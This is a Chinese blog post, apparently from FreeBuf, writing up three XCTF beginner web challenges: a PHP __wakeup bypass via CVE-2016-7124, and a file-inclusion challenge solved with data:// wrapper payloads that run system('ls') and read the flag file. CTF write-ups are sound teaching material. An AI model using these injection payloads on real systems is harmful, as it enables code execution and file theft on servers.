freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Web攻防世界引导模式
璐瑶 2024-08-12 17:45:26 44191

unserial3

反序列化,绕过漏洞

wakeup一旦存在反序列化则代码停止执行,看到这个想到考察我们wakeup漏洞的

因此我们需要根据漏洞(CVE-2016-7124)使序列化字符串中表示对象属性个数的值大于真实的属性个数,以此跳过__wakeup 的执行,达到绕过的目的。

先序列化的到源代码的结果,再改变参数实现绕过

看源代码清楚这是个get传参,直接改写url即可

<?php
class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
}
$a = new xctf();
print(serialize($a));
?>

O:4:"xctf":1:{s:4:"flag";s:3:"111";}

这个字符串的解释如下:

  • O表示这是一个对象。
  • 4是类名xctf的长度。
  • "xctf"是类的名称。
  • 接下来的1表示序列化的对象有一个属性。
  • {s:4:"flag";s:3:"111";}表示有一个名为flag的字符串属性,其值为'111'
    写的好的仅供参考

Web_php_include

文件包含题目解析

原因:对传入的page参数没有好好过滤导致可以写入危险的php代码以获取信息

看代码:代码作用:过滤掉php://(防止利用这个伪协议进行文件包含漏洞执行,但是对大小写不敏感所以还是可以利用)

data伪协议:

?page=data://text/plain,<?php system("ls")?>
?page=data://text/plain,<?php system("cat fl4gisisish3r3.php")?>

php;伪协议

php://input,用于执行php代码,需要post请求提交数据。

warmup

考察php代码的读取能力

先直接看页面代码通过传参

然后看提示的目录文件访问即可

# 漏洞 # 渗透测试 # web安全 # 漏洞分析 # CTF
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 璐瑶 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
璐瑶 LV.3
小鱼不爱吃鱼
  • 5 文章数
  • 2 关注者
攻防世界web引导模式 框架梳理
2024-08-09
SQL注入——SQL注入简单概要
2024-06-22
渗透测试工程师职业要求
2024-06-07
文章目录